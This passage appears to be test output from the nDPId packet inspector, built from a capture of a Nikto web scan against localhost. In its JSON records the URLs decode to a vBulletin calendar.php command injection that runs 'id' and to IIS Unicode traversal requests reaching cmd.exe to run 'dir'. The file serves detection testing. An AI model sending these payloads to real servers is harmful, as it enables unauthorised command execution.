-00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_packet_id":1,"flow_last_seen":1576420277857,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1576420277857,"pkt":"AAAAAAAAAAAAAAAACABFAAEsZgtAAEAG1b5\/AAABfwAAAcc8H5AWK18ypPoEwIAYAED\/IAAAAQEICp1m\/4mdZv+JR0VUIC9odGZvcnVtL2NhbGVuZGFyLnBocD9jYWxiaXJ0aGRheXM9MSZhY3Rpb249Z2V0ZGF5JmRheT0yMDAxLTgtMTUmY29tbWE9JTIyO2VjaG8lMjAnJzslMjBlY2hvJTIwJTYwaWQlMjAlNjA7ZGllKCk7ZWNobyUyMiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7440000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htforum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_packet_id":1,"flow_last_seen":1576420277858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"thread_ts_msec":1576420277858,"pkt":"AAAAAAAAAAAAAAAACABFAAEqtcxAAEAGhf9\/AAABfwAAAcc+H5DIWozz4BLqQYAYAED\/HgAAAQEICp1m\/4qdZv+KR0VUIC9ib2FyZC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/board\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_packet_id":1,"flow_last_seen":1576420277860,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"thread_ts_msec":1576420277860,"pkt":"AAAAAAAAAAAAAAAACABFAAEumzdAAEAGoJB\/AAABfwAAAcdAH5B97qINvJ0VaoAYAED\/IgAAAQEICp1m\/4ydZv+MR0VUIC9jb21tdW5pdHkvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/community\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7440000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00804{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_packet_id":1,"flow_last_seen":1576420277861,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":309,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":309,"pkt_l4_len":275,"thread_ts_msec":1576420277861,"pkt":"AAAAAAAAAAAAAAAACABFAAEntyFAAEAGhK1\/AAABfwAAAcdCH5DLAI4n0VAE+IAYAED\/GwAAAQEICp1m\/42dZv+NR0VUIC92Yi9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7440000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_packet_id":1,"flow_last_seen":1576420277863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"thread_ts_msec":1576420277863,"pkt":"AAAAAAAAAAAAAAAACABFAAEuCCBAAEAGM6h\/AAABfwAAAcdEH5ADaDEo9nQ1BIAYAED\/IgAAAQEICp1m\/4+dZv+PR0VUIC92YnVsbGV0aW4vY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_packet_id":1,"flow_last_seen":1576420277864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277864,"pkt":"AAAAAAAAAAAAAAAACABFAADJt5hAAEAGhJR\/AAABfwAAAcdGH5CwLY6th0R7wIAYAED+vQAAAQEICp1m\/5CdZv+QR0VUIC9fdnRpX2Jpbi9mcGNvdW50LmV4ZSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDg5KQ0KDQo="} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/fpcount.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003089)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_packet_id":1,"flow_last_seen":1576420277866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277866,"pkt":"AAAAAAAAAAAAAAAACABFAADHtYVAAEAGhql\/AAABfwAAAcdIH5CyuYy6IN3YVoAYAED+uwAAAQEICp1m\/5KdZv+SR0VUIC9zaXRlL2VnL3NvdXJjZS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxMjYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site\/eg\/source.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003126)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_packet_id":1,"flow_last_seen":1576420277867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277867,"pkt":"AAAAAAAAAAAAAAAACABFAADlWiBAAEAG4fB\/AAABfwAAAcdKH5CvgWMmQVkzqIAYAED+2QAAAQEICp1m\/5OdZv+TR0VUIC9jZXJ0c3J2Ly4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003190)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_packet_id":1,"flow_last_seen":1576420277870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1576420277870,"pkt":"AAAAAAAAAAAAAAAACABFAADwKqRAAEAGEWJ\/AAABfwAAAcdMH5CrChOaUJIGgIAYAED+5AAAAQEICp1m\/5adZv+WR0VUIC9jZ2ktYmluLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01111{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003191)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_packet_id":1,"flow_last_seen":1576420277871,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1576420277871,"pkt":"AAAAAAAAAAAAAAAACABFAADnEqJAAEAGKW1\/AAABfwAAAcdOH5CE7yudGG3JzIAYAED+2wAAAQEICp1m\/5edZv+XR0VUIC9paXNhZG1wd2QvLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMTkyKQ0KDQo="} 
-01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003192)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7440000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
